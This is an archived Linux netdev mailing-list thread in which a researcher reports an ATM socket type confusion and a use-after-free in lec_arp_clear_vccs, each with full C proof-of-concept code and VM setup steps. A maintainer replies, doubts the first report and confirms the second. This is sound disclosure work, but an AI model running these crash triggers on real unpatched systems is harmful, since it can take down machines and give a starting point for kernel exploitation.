* Two bugs report
@ 2020-04-27 13:15 Gengming Liu
2020-05-01 5:46 ` Cong Wang
0 siblings, 1 reply; 2+ messages in thread
From: Gengming Liu @ 2020-04-27 13:15 UTC (permalink / raw)
To: netdev
We found two security bugs in the linux kernel and here's the
description of the bugs.
0.Build a testing environment
a. Set up Ubuntu 19.04 in Vmware workstation.
b. sudo apt install linux-image-5.0.0-21-generic.
c. Change the grub default boot entry to 5.0.0-21-generic. (see
https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order)
cat /proc/version. If it is as following, it means you succeed.
"Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019"
d. compile the poc by using gcc.
e. Excute poc by "sudo ./poc"
f. Use dmesg to check kernel message about crash.
1.atm_vcc_userback type confusion
atm(AF_ATMSVC) socket's vcc->user_back can be treated as different
types of structures.
To trigger this bug it requires CAP_NET_ADMIN.(Use sudo ./poc)
The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
Proc version is:
Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019
Poc:
#include <linux/socket.h>
#include <linux/atmdev.h>
#include <linux/atmarp.h>
#include <linux/atmlec.h>
#include <linux/atmsvc.h>
#include <linux/atmmpc.h>
#include <linux/atmclip.h>
int main(int argc, char const *argv[])
{
int fd;
fd = socket(0x14,3,0);
ioctl(fd,0x61d8, 0x17); //ATMMPC_CTRL
unsigned long long arg = 1;
ioctl(fd, 0x400261f2, &arg ); //ATM_SETBACKEND
ioctl(fd, 0x61e2, 1 ); //ATMARP_MKIP
char buffer[] =
"\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
setsockopt(fd,0xe0c7, 0x80, buffer,0x16);
return 0;
}
2.use-after-free in lec_arp_clear_vccs.
UAF object: struct atm_vcc *vcc
vcc is a atm(AF_ATMSVC) socket.
To trigger this bug:
1. Create vcc socket #A and #B
2. ioctl(ATMLEC_CTRL) to attach #A to lec device.
3. ioctl(ATMLEC_DATA) to attach #B to device's priv->lec_arp_empty_ones list
4. close socket #B
5. close vcc socket #A to call lec_arp_clear_vccs() to trigger UAF
To trigger this bug it requires CAP_NET_ADMIN. (Use sudo ./poc)
The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
Proc version is:
Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019
Poc:
#include <linux/socket.h>
#include <linux/atmdev.h>
#include <linux/atmarp.h>
#include <linux/atmlec.h>
#include <linux/atmsvc.h>
#include <linux/atmmpc.h>
#include <linux/atmclip.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/uio.h>
#include <signal.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/inotify.h>
#include <sys/types.h> /* See NOTES */
#include <sys/socket.h>
//#include <linux/wireless.h>
#include <sys/types.h> /* See NOTES */
#include <sys/socket.h>
#include <linux/socket.h>
#include <sys/un.h>
#include <stdbool.h>
#include <netinet/in.h>
#define SOCK_PORT 10000
struct my_mmsghdr
{
struct msghdr msg_hdr; /* Message header */
unsigned int msg_len; /* Number of bytes transmitted */
};
void *sendmmsg_client_func()
{
int sockfd2;
struct sockaddr_in *paddr;
char szbuff[2050];
int ret;
struct sockaddr_in local_addr;
local_addr.sin_port = htons(SOCK_PORT /*+ getpid()*/);
local_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
local_addr.sin_family = AF_INET;
memset(szbuff, 0x2b, 2048);
sockfd2 = socket(AF_INET, SOCK_DGRAM, 0);
paddr = &local_addr;
while (0 < connect(sockfd2, paddr, sizeof(*paddr)))
{
perror("connect");
usleep(11);
}
struct msghdr msg;
struct my_mmsghdr mmsg;
struct iovec vec;
vec.iov_base = szbuff;
vec.iov_len = 1;
msg.msg_name = paddr;
msg.msg_namelen = sizeof(*paddr);
msg.msg_iov = &vec;
msg.msg_iovlen = 1;
msg.msg_control = szbuff;
msg.msg_controllen = 2048;
msg.msg_flags = 0;
mmsg.msg_hdr = msg;
mmsg.msg_len = 1;
ret = syscall(__NR_sendmmsg, sockfd2, &mmsg, 1, 0);
if (ret < 0)
{
perror("sendmmsg");
}
}
void force_loop(){
/* code */
int sockB,sockA;
int dev = 3;
struct atmlec_ioc ioc_data;
sockB = socket(0x14, 0x2, 0x0);
sockA = socket(0x14, 0x2, 0x0);
ioctl(sockA, ATMLEC_CTRL, dev);
ioc_data.dev_num = dev;
ioc_data.receive = 1;
ioctl(sockB, ATMLEC_DATA, &ioc_data);
close(sockB);
sendmmsg_client_func();
close(sockA);
}
int main(int argc, char const *argv[])
{
force_loop();
return 0;
}
^ permalink raw reply [flat|nested] 2+ messages in thread
* Re: Two bugs report
2020-04-27 13:15 Two bugs report Gengming Liu
@ 2020-05-01 5:46 ` Cong Wang
0 siblings, 0 replies; 2+ messages in thread
From: Cong Wang @ 2020-05-01 5:46 UTC (permalink / raw)
To: Gengming Liu; +Cc: Linux Kernel Network Developers
On Mon, Apr 27, 2020 at 6:16 AM Gengming Liu <l.dmxcsnsbh@gmail.com> wrote:
>
> We found two security bugs in the linux kernel and here's the
> description of the bugs.
>
> 0.Build a testing environment
> a. Set up Ubuntu 19.04 in Vmware workstation.
> b. sudo apt install linux-image-5.0.0-21-generic.
> c. Change the grub default boot entry to 5.0.0-21-generic. (see
> https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order)
> cat /proc/version. If it is as following, it means you succeed.
>
> "Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019"
>
> d. compile the poc by using gcc.
> e. Excute poc by "sudo ./poc"
> f. Use dmesg to check kernel message about crash.
>
> 1.atm_vcc_userback type confusion
>
> atm(AF_ATMSVC) socket's vcc->user_back can be treated as different
> types of structures.
>
> To trigger this bug it requires CAP_NET_ADMIN.(Use sudo ./poc)
>
> The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
> Proc version is:
> Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019
>
> Poc:
> #include <linux/socket.h>
> #include <linux/atmdev.h>
> #include <linux/atmarp.h>
> #include <linux/atmlec.h>
> #include <linux/atmsvc.h>
> #include <linux/atmmpc.h>
> #include <linux/atmclip.h>
>
> int main(int argc, char const *argv[])
> {
> int fd;
> fd = socket(0x14,3,0);
> ioctl(fd,0x61d8, 0x17); //ATMMPC_CTRL
>
> unsigned long long arg = 1;
> ioctl(fd, 0x400261f2, &arg ); //ATM_SETBACKEND
> ioctl(fd, 0x61e2, 1 ); //ATMARP_MKIP
>
> char buffer[] =
> "\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
> setsockopt(fd,0xe0c7, 0x80, buffer,0x16);
What is this setsockopt() for? I don't connect it to user_back.
The ATM code checks for user_back before using, for example,
if (cmd != ATM_SETBACKEND && atmvcc->push != pppoatm_push)
return -ENOIOCTLCMD;
>
> return 0;
> }
>
> 2.use-after-free in lec_arp_clear_vccs.
>
> UAF object: struct atm_vcc *vcc
>
> vcc is a atm(AF_ATMSVC) socket.
>
> To trigger this bug:
>
> 1. Create vcc socket #A and #B
> 2. ioctl(ATMLEC_CTRL) to attach #A to lec device.
> 3. ioctl(ATMLEC_DATA) to attach #B to device's priv->lec_arp_empty_ones list
> 4. close socket #B
> 5. close vcc socket #A to call lec_arp_clear_vccs() to trigger UAF
Yeah, good catch. I have a fix for this, will send it out shortly.
Thanks for the report!
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2020-05-01 5:46 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2020-04-27 13:15 Two bugs report Gengming Liu
2020-05-01 5:46 ` Cong Wang
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).